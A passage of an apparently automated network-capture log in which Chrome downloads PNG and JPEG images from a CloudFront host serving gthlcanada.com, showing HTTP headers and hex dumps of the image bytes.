                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6306947fb6ab60dc617ca2e025941652.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: SrDcBlVHPmQm2Rd2IMl7euvOoh-EA7Qtyx9468zfJ7QEMuRxAsbvHg==
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 da 00 00 02 80 08 06 00 00 00 a2 fb df a2 00 00 80 00 49 44 41 54 78 da ec fd e9 97 24 47 96 e5 89 fd 9e 88 aa 99 f9 ee 1e 7b 04 b6 44 02 89 44 ee 59 dd d9 35 c3 ee 39 cd e9 19 ce 39 3c fc c8 ff 75 48 1e 9e e1 90 9c c3 61 0d ab 3b 3b ab 72 05 12 09 04 80 d8 23 7c 5f 6c 53 15 79 fc 20 a2 aa a2 6a 6a be c4 02 20 ab d3 4f a1 12 11 70 37 57 53 13 15 b9 ef be fb ee 95 df fe d3 ff a2 82 20 22 00 28 4a fa 25 08 62 0d 65 59 62 8d 21 b3 19 ea 3d 45 31 47 8c 80 84 9f 11 63 50 af 08 86 cb 7c 49 fc 7f 82 a0 f5 6f 0d ff 2e 62 50 ad fe 1b 18 23 74 2e 2b 7c 79 05 0d 3f 2b d5 df a9 22 a2 18 63 f0 aa 68 fc c7 18 b3 70 01 2a 06 2f 82 40 fd fe 25 fe 1e 11 41 35 bc be 00 a2 0a ea 11 63 c2 6b 55 f7 4b ba 6f 4c 90 ea 67
                                                                                                                          Data Ascii: PNGIHDRIDATx$G{DDY599<uHa;;r#|_lSy jj Op7WS "(J%beYb!=E1GcP|Io.bP#t.+|y?+"chp*/@%A5ckUKoLg
                                                                                                                          2025-01-13 21:01:21 UTC607INData Raw: bf d9 0d fb f5 9b 16 49 92 20 79 8e 43 dd cb fe 5e d5 de e4 c9 96 e5 63 ab a8 d4 84 d9 6e 0a 0b 8d 15 40 e5 92 64 81 4c 2c 05 06 4f 46 66 2c 23 81 d9 de 73 ee ff f6 9f d9 fd e2 73 86 93 29 2b 02 d8 8c 12 c1 9a 0c 21 b8 88 dc bd f3 0e 2b 79 81 d5 29 a7 67 7b ec 9f ee 73 5a 38 6e de d9 64 73 94 71 f7 ce 1d fe c3 7f f8 6f 99 97 c1 be 72 90 09 03 03 a3 e1 80 db b7 6e 32 18 58 9e 3d fa 8a 62 72 4a 66 1c 19 e2 13 80 d5 26 40 e5 dc 2d 4f 3a ed b5 e0 a3 d9 8d 4a 0e cc f3 a2 78 24 f8 17 ca 39 af 4a eb ba 9a df 55 a9 db a9 a7 92 4b 40 cc 00 6f 57 28 b3 15 66 64 e4 62 c9 f0 88 1a f2 ca 63 59 2c 98 1c 47 46 a9 19 25 e0 b5 0c 49 3e 0c 29 d5 80 b5 71 68 c8 c5 89 55 13 74 8c 46 eb 1b 54 0f e1 c0 a2 63 47 cf 21 9f ea 58 17 1f fa e4 61 97 d4 8f 45 1a 4b 22 aa a1 44 59 f4
                                                                                                                          Data Ascii: I yC^cn@dL,OFf,#ss)+!+y)g{sZ8ndsqorn2X=brJf&@-O:Jx$9JUK@oW(fdbcY,GF%I>)qhUtFTcG!XaEK"DY
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 62 54 43 87 62 a1 28 83 37 f8 e1 d1 31 9f 7f 7e 9f db b7 6e 73 e3 c6 f5 58 60 18 bc 3a 30 01 de 54 c3 e3 ad 36 e5 32 02 68 19 59 51 dd 3b 69 57 cf d2 0a 90 39 e7 11 52 5a af ad 69 eb db 2f 99 01 5a b6 37 a8 ef 71 53 59 12 db 5d 0d ae 5e 79 5f 4b a5 a2 8b 67 59 20 fe ba 36 82 57 0f 95 58 c8 a7 eb 24 2a be 19 60 bd ec 3e 48 cb 75 a4 8d 35 92 6b d2 34 33 45 7b 42 fb 9a ee 74 95 81 d1 2f c1 59 7c ff aa 31 89 32 5a f6 a9 b4 b8 07 2a a7 6c 03 64 98 e8 b0 94 e3 35 c3 9a 01 b9 2f 79 fe e5 57 ec 7d fe 19 76 72 4a ae e0 c5 30 b7 c2 2c b3 b8 2c e4 a1 ac 0e 72 c4 e5 8c f7 9e 71 7a f8 84 f1 fc 80 b1 3f c3 0f 46 0c 32 47 6e 95 ed b5 11 d7 ae 7f 40 89 25 cb 72 44 3c a2 05 c6 cf 98 9c 1d f2 f4 c1 53 e6 27 47 0c a2 a7 7e b6 ac 7c 95 84 1b ea 3d 3c 94 94 57 68 c8 58 6d fb
                                                                                                                          Data Ascii: bTCb(71~nsX`:0T62hYQ;iW9RZi/Z7qSY]^y_KgY 6WX$*`>Hu5k43E{Bt/Y|12Z*ld5/yW}vrJ0,,rqz?F2Gn@%rD<S'G~|=<WhXm
                                                                                                                          2025-01-13 21:01:21 UTC12792INData Raw: 1a ad b5 5e 95 b3 c0 e1 e1 3e 2f 9e bf e0 d1 93 c7 9c 1c 1f d7 4c 8b 44 56 ab 62 d0 9c 0b 07 aa c4 b8 5c f5 3e b2 99 1e 75 c1 3b bb f6 76 25 8d db 35 f5 9f 44 0c e2 5d f8 d4 9d 47 c3 50 3b be 62 b1 4b 0f 45 89 cf 94 c2 94 41 4e 30 75 9c 1c ef 53 ce ef 32 9f 8c f9 ea f9 63 f2 7c c0 db ef 7c c0 cd eb d7 f8 f2 cb 87 38 3f 41 62 18 49 e9 3c 47 c7 27 9c 8e 27 ec ed 1f 70 f3 c6 8d 30 90 73 ed 5a d8 d4 00 89 de be e9 90 6c 7a ff 75 21 52 5c 17 c2 83 16 e2 c9 3b 03 ff ad 79 97 de 19 80 a5 b1 aa 0b 8b ab 8b 01 cf 2f a8 f4 35 c0 6c 6d 5f b8 34 77 86 a4 69 15 b4 a8 21 47 08 31 1c 9f 4d 79 fc fc 80 d3 b1 a3 70 01 9c 8d 67 05 33 b5 d8 ad 9b 8c b3 35 4c e6 59 5d 5f e3 f6 3b df e3 fa 7b 1f 30 f5 8e 67 cf 9e b2 7d 7d 80 b5 eb 4c dd 51 ed e9 9b af ed b0 b5 7d 9b e9 78 c6
                                                                                                                          Data Ascii: ^>/LDVb\>u;v%5D]GP;bKEAN0uS2c||8?AbI<G''p0sZlzu!R\;y/5lm_4wi!G1Mypg35LY]_;{0g}}LQ}x
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: e6 3e ec c3 66 64 5d 33 d5 89 90 e2 dd 2e 78 9b db bd e9 2b 77 48 e9 80 92 f5 7a c1 62 71 11 52 90 d7 68 19 c8 23 ae 0c 2c 7b 7f 30 b6 d6 f9 ec 0b 21 49 3b 03 b6 7b 5d 76 87 3d a6 8b 19 17 93 09 bb c3 1b 5c ac 4a 3e 7b fa 86 f3 4b 4b fc fb b7 8c fa 03 b6 ba 09 83 5e c2 b0 df 25 56 82 58 69 3a 89 e0 fe ed db 94 c5 82 67 2f 9f 31 5f 2c 58 af d7 9c 5f 9c 71 63 7f c4 5f fe f2 01 8b f9 31 cb e9 f7 44 5c a0 a5 6f f8 0a 0c ca 09 54 a0 f2 e5 d6 22 a4 26 ed 74 2b 8d 76 10 c3 6f 84 8c 8b 16 39 c2 0b cc ad 90 08 14 d3 d9 9a 75 6e 31 48 9c 31 a4 b1 64 5d e4 58 9d 20 47 bb b8 e5 8c 1b 77 0e 79 f8 e4 31 bd ad 2d 8e 2f 2f f8 f6 0f df f3 e1 9f 3d 04 b9 c5 dc f4 00 89 90 9a fd bd 7b ec 6c dd 61 ba 58 32 5b ce 19 1c dc 05 bd c3 7f fd db 67 fc 5f 9f be 20 33 11 c8 2e 4a a5
                                                                                                                          Data Ascii: >fd]3.x+wHzbqRh#,{0!I;{]v=\J>{KK^%VXi:g/1_,X_qc_1D\oT"&t+vo9un1H1d]X Gwy1-//={laX2[g_ 3.J
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 86 22 2f 82 4c 23 98 99 82 a4 43 d6 d7 a0 61 af 8b c6 2d 54 2f dc 8e 6a 61 f2 dd fc 0a 01 e9 5c 25 73 10 8d c1 e4 ca 78 bf 39 4c b4 a8 14 ce c7 44 5b 63 89 d6 6b ce cf cf d9 dd 1b 93 24 51 88 6b 6e 12 ee aa d1 24 57 ba f9 ee c7 60 cd 2d e6 ed 3f af 46 db 35 72 83 2a cc c8 19 b0 05 ab d5 84 d5 e2 82 d5 e2 12 61 ab eb df da 9c 42 fc 6f 51 0a 1c 31 71 da a3 3b d8 a6 37 1a 93 c6 12 53 cc 59 64 19 22 4e 29 10 1c 5d 4c 99 e7 06 97 67 4c e6 6b 22 57 60 4a 53 87 46 a5 91 62 90 c0 2f 3f ba c7 ee 40 f1 d9 ef 9e b1 5a cd 29 9d f5 45 78 22 d8 ea 26 38 3b c5 b9 0b 92 68 45 24 bd 59 b6 34 0a 27 bb 08 a7 28 8b 04 dd dd a2 d3 db f6 f2 11 a1 30 4e d4 fa f7 3a 0f 54 88 1f 95 e5 b4 47 d6 42 48 bf 76 3b e7 7d 19 f3 19 a3 d1 56 30 93 97 ec ec 8c 51 aa 4a 17 b5 f5 86 d8 e6 14
                                                                                                                          Data Ascii: "/L#Ca-T/ja\%sx9LD[ck$Qkn$W`-?F5r*aBoQ1q;7SYd"N)]LgLk"W`JSFb/?@Z)Ex"&8;hE$Y4'(0N:TGBHv;}V0QJ
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: a5 88 3f 4a b9 f7 6a 12 8c 81 a9 36 c3 bf 75 bb 59 b9 4e 2f e6 9f c9 93 1c c7 8c aa ae 01 f2 c3 f5 12 e7 e0 81 a1 5f a1 6c 4e 9d 68 43 c1 10 b6 3a c6 51 c7 9f c7 ed 3a 2e d3 3a be 4f 1d 68 4e 1a 58 72 14 46 42 89 92 22 4d ad 37 c0 0e eb 16 13 b9 7e 76 81 0b c7 a8 9d 03 39 46 1b 7a ac d3 5a 35 b0 cc 92 22 2b 6d 15 2a a4 07 8f d4 ed 3f a8 f5 cf 53 3c 1d 8c a7 04 bb ee 8c b1 31 93 d8 a2 12 c7 0c bf f2 bb 48 32 6c 73 41 5a 3d 21 fd 63 f0 bf 48 01 72 a7 3f 67 d8 67 cb d0 80 7b 52 29 e8 29 cf 85 4e 78 84 a9 8a 6e 48 5e d1 74 58 94 23 f0 9c b3 b1 ef eb 8f 19 c8 b8 49 ea c6 b1 b6 7c f2 7e ee 59 6e e7 f2 94 d3 aa 82 b1 4d b5 24 b7 e6 13 ca b1 28 a8 7c 5f 63 99 4c 09 ea 97 e4 2d cb 5e ee 14 5f 3c 23 f0 8e 4d b9 c5 97 1f 65 68 e8 83 6c 85 17 a1 34 f2 71 58 6d ae 50
                                                                                                                          Data Ascii: ?Jj6uYN/_lNhC:Q:.:OhNXrFB"M7~v9FzZ5"+m*?S<1H2lsAZ=!cHr?gg{R))NxnH^tX#I|~YnM$(|_cL-^_<#Mehl4qXmP
                                                                                                                          2025-01-13 21:01:21 UTC7656INData Raw: 2a 6e e0 d1 da 9e 9a f2 ab 6d 8b b4 a2 2c 62 06 78 0d 75 e7 a8 56 67 d6 f2 4c 0e 11 d1 fe 5e a6 73 f9 fc 3b 2d 2a ba 07 ad f6 29 70 35 dd 2d a7 46 b8 72 44 bc c8 9a a2 90 cb 8e 21 0d 58 98 a8 d1 3d 03 a2 61 32 5f 82 eb 05 39 9c 9e c2 45 43 2e f8 32 10 5f 02 b8 4c c5 64 7c 76 98 d0 45 2e bd 94 a2 1e b3 df cb f2 18 fd d6 ab ca c9 e9 fc 03 9f e3 bd 20 9b 1e b1 56 e9 38 a5 cf cf a9 42 e1 47 cd 71 c1 47 eb 31 44 a5 b9 fe e4 84 31 b2 8c 9c d3 c5 ea f1 a1 5a e6 49 63 5e 3d c1 68 eb 22 09 a2 8f 3a e1 f0 c9 93 d0 28 0b 29 13 a2 28 65 12 e7 f1 89 11 ab 04 61 1e 15 05 09 50 cf 41 2f a7 68 40 a3 5d 8b 87 0a d3 91 83 01 32 1d f2 c8 4b 76 7b ea 70 2d 4e c3 34 bf 91 97 01 f7 98 df 8c c9 35 1c d9 75 3c cc d6 95 a3 b2 7b d8 ec b9 59 64 7e a3 7f 17 16 9c 0a 39 c6 e6 6c 83
                                                                                                                          Data Ascii: *nm,bxuVgL^s;-*)p5-FrD!X=a2_9EC.2_Ld|vE. V8BGqG1D1ZIc^=h":()(eaPA/h@]2Kv{p-N45u<{Yd~9l
                                                                                                                          2025-01-13 21:01:21 UTC12792INData Raw: f7 a0 c7 4e 0c f0 a0 71 2d c6 58 8f 15 39 dd 93 04 78 0f a0 5d 3a 61 58 ea 89 4e 5e a3 81 03 51 81 b5 c3 da f8 29 27 90 b0 fd 87 55 83 7b 7b 3f 2e b5 f0 51 7e b8 89 47 40 a2 65 7d ce 89 83 d0 12 03 af a7 f5 d5 9a c6 9a c3 c3 3f 3f 41 e9 74 d1 79 68 d4 3e b9 f6 f4 f4 7b 37 03 bb 6c 10 cd 9b e8 a4 35 33 6b dc f2 69 9b 19 55 53 81 3d a5 8c 66 e0 ac a9 f1 ac df 40 42 44 e3 7d 62 50 92 d6 d8 3b 33 f3 44 31 e6 76 d5 18 93 93 64 1b 4c 3a 74 32 40 15 95 b7 9c db 4c c9 89 98 ae 9b 29 b7 1f 06 44 24 f6 07 6e bc f6 92 f4 ce a4 e9 67 d2 18 df 97 ae f9 30 e1 40 71 f8 49 9b 8c 94 07 cb f4 75 ce 3b 38 f6 50 98 fe 51 45 53 a9 0c 12 20 0f 60 28 b4 6f c1 1a f1 fc 62 83 cb 73 45 e8 7a 54 ae 02 a4 b3 64 11 8a 58 d7 0e 4d 75 8e 10 05 5d d7 22 8a a0 aa 2a 38 52 88 04 00 96 d6
                                                                                                                          Data Ascii: Nq-X9x]:aXN^Q)'U{{?.Q~G@e}??Atyh>{7l53kiUS=f@BD}bP;3D1vdL:t2@L)D$ng0@qIu;8PQES `(obsEzTdXMu]"*8R
                                                                                                                          2025-01-13 21:01:21 UTC12792INData Raw: 01 4a 02 a7 93 12 0f 1f 1f 63 3c 6b 30 1a 0d d1 ef f5 b0 bb b3 8b ed ed 3d 6c 6d ed 20 cf 0a 48 a1 89 e3 cf c8 42 5a 1a 05 c9 7c b8 18 96 d1 14 1a 63 b8 42 e8 a4 57 cb 0e b5 6c ad ec e5 06 cc fa ae 14 69 50 29 3d d8 b3 b1 3c c9 17 45 9b ee 1b be e0 21 3b 37 0a f5 ab cf de 8a 97 67 bd 98 15 a9 91 d8 a2 51 57 bb 57 82 a5 7c 51 3a 15 7c 20 53 3b 1f ca bc b7 c8 73 43 0d 21 99 b5 d2 d5 b0 ee 9f ea ca 40 98 20 23 56 bb de e2 25 fb 3b bd ff b6 db 2b ba 87 9b e4 8b 5a 17 bb 06 1a e2 74 fc 45 d1 43 b4 ba f4 f8 35 ad 83 80 f3 1e 4f 9e 3c c1 87 1f 7e 88 a6 a1 c9 16 d1 da 3c ac b3 2d 9c a0 63 d8 76 ce a5 29 b6 31 06 b7 6e dd 4a ef b5 c8 0b f8 e0 31 9f cd 71 7a 7a 8a d9 7c 86 a6 69 50 14 05 76 76 76 b0 bd bd 0d 21 04 0e 9e 1d 60 be 98 43 49 85 a6 69 50 d7 35 9a a6 c1
                                                                                                                          Data Ascii: Jc<k0=lm HBZ|cBWliP)=<E!;7gQWW|Q:| S;sC!@ #V%;+ZtEC5O<~<-cv)1nJ1qzz|iPvvv!`CIiP5


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          128192.168.11.204995754.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC648OUTGET /app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 78473
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 14 Nov 2024 14:23:37 GMT
                                                                                                                          ETag: "680a0fdad729fec37c86c09d7b72256c"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 5451b84324d9bca0bdd03e4c4009ae10.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: sGTY4d2FTojRlHPT9FDlu-ES0-TIFDiarFS6l63AVLMEWq9pjPptmw==
                                                                                                                          2025-01-13 21:01:21 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 32 76 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 30 37 20 31 31 3a 35
                                                                                                                          Data Ascii: JFIF2vExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:07 11:5
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2 3f d2 c1 d3 44 d3 c6 d4 49 d4 cb d5 4e d5 d1 d6 55 d6 d8 d7 5c d7 e0 d8 64 d8 e8 d9 6c d9 f1 da 76 da fb db 80 dc 05 dc 8a dd 10 dd 96 de 1c de a2 df 29 df af e0 36 e0 bd e1 44 e1 cc e2 53 e2 db e3 63 e3 eb e4 73 e4 fc e5 84 e6 0d e6 96 e7 1f e7 a9 e8 32 e8 bc e9 46 e9 d0 ea 5b ea e5 eb 70 eb fb ec 86 ed 11 ed 9c ee 28 ee b4 ef 40 ef cc f0 58 f0 e5 f1 72 f1 ff f2 8c f3 19 f3 a7 f4 34 f4 c2 f5 50 f5 de f6 6d f6 fb f7 8a f8 19 f8 a8 f9 38 f9 c7 fa 57 fa e7 fb 77 fc 07 fc 98 fd 29 fd ba fe 4b fe dc ff 6d ff ff ff ed 00 7e 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 62 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 04 1c 02 37 00 08
                                                                                                                          Data Ascii: 8655679<?DINU\dlv)6DScs2F[p(@Xr4Pm8Ww)Km~Photoshop 3.08BIMbZ%G7
                                                                                                                          2025-01-13 21:01:21 UTC2138INData Raw: 58 7b 6e 5f 6f 74 1e 8b d3 c3 84 b3 79 7a 73 ca df 51 88 c6 30 ec 7a 58 9b 51 5c ca 99 81 16 6b df 72 3e 4b d1 87 2f 14 ba 95 9e 4e 9b 9b 5b b1 46 ec 36 ae c7 d8 b8 73 5d bf 13 1f d5 e7 fc 0c ff 00 40 65 a7 92 0c b9 db 60 46 eb 53 29 5c f2 e3 b3 da 24 af b3 b4 5a 62 a6 e1 98 b5 6e 15 38 a8 a3 9d f1 3c 73 1b 1f 31 cd 67 2c 66 53 55 ac 72 b3 cc 75 ce 09 e2 f6 f1 1d 2b a3 9b 2b 2a e2 f7 9a 34 cc 3a 80 bc 3c bc 5d 95 ec e2 e5 ef 9f bb 4c e1 cd 70 f2 ea ca 7a 46 39 38 56 ab c4 b7 f5 5d fa 7f ae 39 f3 7d 15 c4 46 85 7d 47 cf 34 ee 81 5b a2 07 3c 77 50 34 6c 81 d1 73 40 b2 fb c8 1a cf 78 20 23 b5 28 0b 00 37 ba 0f 1d 03 b4 50 01 ca 86 f2 41 21 be eb 10 32 51 72 80 6e 3a 59 03 e3 1e cb e6 81 08 d5 02 37 e2 37 cd 01 d8 0e 72 81 8f 40 c7 6c 82 48 1e cd bb 6c 81 24
                                                                                                                          Data Ascii: X{n_otyzsQ0zXQ\kr>K/N[F6s]@e`FS)\$Zbn8<s1g,fSUru++*4:<]LpzF98V]9}F}G4[<wP4ls@x #(7PA!2Qrn:Y77r@lHl$
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 74 08 3d e1 e6 82 5b 47 79 de 48 00 f1 aa 06 9b 59 04 98 4d e1 01 03 e5 68 30 b5 13 48 db 1d 02 29 7e 68 0d 19 bb 9a 82 55 56 c1 04 27 ec 80 94 f7 31 3b cd 03 1d a1 40 db eb aa 05 06 c8 9b 4c a6 24 8b 22 81 30 01 fa a0 11 40 ad 41 2a 21 dd d1 13 44 78 37 d5 14 3b 6a 89 a1 a1 bd c2 9a 54 89 c5 a3 48 21 40 2f 37 c8 aa 12 4d 5c 50 33 5f 04 1d 2c 2f d1 da dc 7b e4 b9 64 ac bf 16 fb f1 85 f2 7a ef 71 a8 cd 95 e0 2e c8 a3 3b 3c 21 21 ed ba 2c 83 b0 2c 57 4d 3e 85 f4 56 6d c3 74 fe 41 7e 53 e2 5f 9d 5f a0 e9 7f 2e 37 12 49 a2 f9 f2 69 e9 d2 34 92 7b 37 79 2d 56 5c bf 11 97 fb 66 63 e2 57 4c 67 87 49 92 2c 93 de 53 aa 76 f9 5d 82 f9 bd a8 0b 5d ac da f0 97 be 75 57 49 28 75 32 1c ed 57 b4 ee 3a 79 2d 97 c9 6a c3 62 b5 c4 c2 56 6a ed ea 62 4b c2 69 25 3d c3 e9 6d
                                                                                                                          Data Ascii: t=[GyHYMh0H)~hUV'1;@L$"0@A*!Dx7;jTH!@/7M\P3_,/{dzq.;<!!,,WM>VmtA~S__.7Ii4{7y-V\fcWLgI,Sv]]uWI(u2W:y-jbVjbKi%=m
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 8a 2b 02 20 ec 08 25 51 8e fa 55 91 dc 78 58 5b 04 a7 fb ab e3 f3 7d 75 f5 78 b7 d9 16 cb 94 69 0b 19 ff 00 37 4d f7 4a dc 66 d7 21 fa f2 f9 95 bf ba 19 1e 91 bd 40 3a 63 6c c5 11 36 87 52 f2 b1 5d 31 16 9c 5e 67 29 b5 d8 76 fa 5b 40 ea 9f 64 f7 52 ab 07 78 2c 4a d5 f0 99 08 b5 12 cd f6 dc f4 25 1d c4 44 ac b5 02 ff 00 4e 15 4a 9a 46 50 34 58 ab 0f 9e 30 58 d5 0d 15 ed b4 23 a2 a1 29 9b 70 6c a6 c8 7c 83 b8 9b 5f b8 92 fc 00 a1 69 b4 e4 88 1d 6e 6a d4 3d 8d f6 3a f2 2a 4a 05 88 d7 c0 cc 14 b2 39 a3 73 e4 de ce da e7 fa 0b 2f bb d2 61 a9 1f 23 a9 cf 76 a8 38 2a 13 37 ae e2 04 7c 79 cb 5a 7f 85 ab cd f1 2c f7 94 c5 e8 e8 30 f9 6e 4d 15 40 b4 cd 01 7c d7 b9 2a a5 96 80 11 d1 4d 9a 46 87 e1 3a ea a1 06 e8 95 6f 80 b1 ce 7c c7 ea 80 0a fd 0f c0 38 e5 e4 cb 3f
                                                                                                                          Data Ascii: + %QUxX[}uxi7MJf!@:cl6R]1^g)v[@dRx,J%DNJFP4X0X#)pl|_inj=:*J9s/a#v8*7|yZ,0nM@|*MF:o|8?
                                                                                                                          2025-01-13 21:01:21 UTC4370INData Raw: c3 a3 81 a3 5b 5d c7 a9 5f 17 97 92 e7 95 af af c7 84 c3 1d 3b 1f 05 0b f0 2d 05 bf fe 45 47 fd 2b bd fc 9c 5f 43 e1 bf 9d 97 fc 7f 96 76 b0 1e d9 de 6b e7 67 ed fd 13 87 e9 46 2b 9e dd 89 ba 0f 22 bd 64 d0 52 aa 35 7e 8c d9 9f 8a a1 3f 66 37 9f c9 7a ba 3f cc 7e 7f fa 9a eb a1 cb f9 8e c4 76 5f 76 7a 7f 2e a1 3d 69 00 7a a2 3c 8a 08 b2 a2 c5 64 9f 1e 6f 31 fa 22 c4 49 ce a8 d2 be 74 55 45 61 dd 06 23 8c 7b d4 d2 b4 6e 69 e5 fd 02 f3 73 dd 65 87 f2 e9 c7 3e 5c bf 87 15 c5 5c de ce 9d bb dd 84 7e 6b e8 f5 13 4f 9f c7 e5 0e 4e 1e c4 e2 c3 8e 27 25 14 f1 d1 87 88 c4 cf 6e 50 5c 76 02 fb ec bc d8 f2 63 be d7 5e db ad a2 08 c3 86 ab ab 22 44 72 68 50 5c 70 b6 3e 70 0c 4c 48 f2 4d 3c 9d d9 40 e5 d0 fc 97 ab a4 e7 fc 2c fc fa ae 3c fc 5f 89 8f ee eb b4 b5 71 cd
                                                                                                                          Data Ascii: []_;-EG+_CvkgF+"dR5~?f7z?~v_vz.=iz<do1"ItUEa#{nise>\\~kON'%nP\vc^"DrhP\p>pLHM<@,<_q
                                                                                                                          2025-01-13 21:01:21 UTC6916INData Raw: 72 b1 2a 2c 80 12 a5 86 c3 0e 2d 36 28 a5 71 d7 cd 03 98 5a 37 50 11 ae 16 56 07 c5 a2 b5 95 4e 2b 51 da d4 06 03 70 cf d5 72 ca ba 45 73 87 74 ae 75 51 1c 35 5a 08 5b 74 0d 73 50 3e 97 49 7c d0 48 96 c3 44 4d a3 3c 22 a6 53 0b d3 0f 34 0a 4e 88 9b 0f 40 8a 56 9b b9 03 b2 dc 14 0e 02 c3 44 0a c0 09 08 0f 60 34 52 86 03 77 91 e0 93 69 a3 4b 45 ce a1 54 ed 6c 30 31 7c 46 3f 35 f0 7e cf bb 1d 0c 7b ab 2a 41 6d fa 20 63 67 8d c4 b4 3d b7 56 02 5b 9a 68 78 0e 8a a3 c4 22 0f 40 3e 95 1f 9a b0 b1 af 84 e5 21 75 95 ce d4 87 9d 16 99 73 fe 39 76 6a 98 c2 e3 ca e9 83 8e f1 5e 28 2a 6a 8c 31 ba f1 c7 a7 99 5e ce 97 8f 53 77 ee f2 f5 3c 9b ba 88 9c 33 85 9c 42 b8 3d e0 f6 51 9c c7 c5 6f a8 e5 ec c7 c3 9f 4f c7 dd 97 9f 4e 86 e0 01 60 1a 01 c9 7c 8a fa 93 42 55 9b 46
                                                                                                                          Data Ascii: r*,-6(qZ7PVN+QprEstuQ5Z[tsP>I|HDM<"S4N@VD`4RwiKETl01|F?5~{*Am cg=V[hx"@>!us9vj^(*j1^Sw<3B=QoON`|BUF


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          129192.168.11.204995854.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC438OUTGET /app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 65724
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 02 Jan 2025 15:56:22 GMT
                                                                                                                          ETag: "d47bf6f189b1305801e65b70197eaf75"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d5710f445906ae917df909d01c495c9e.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
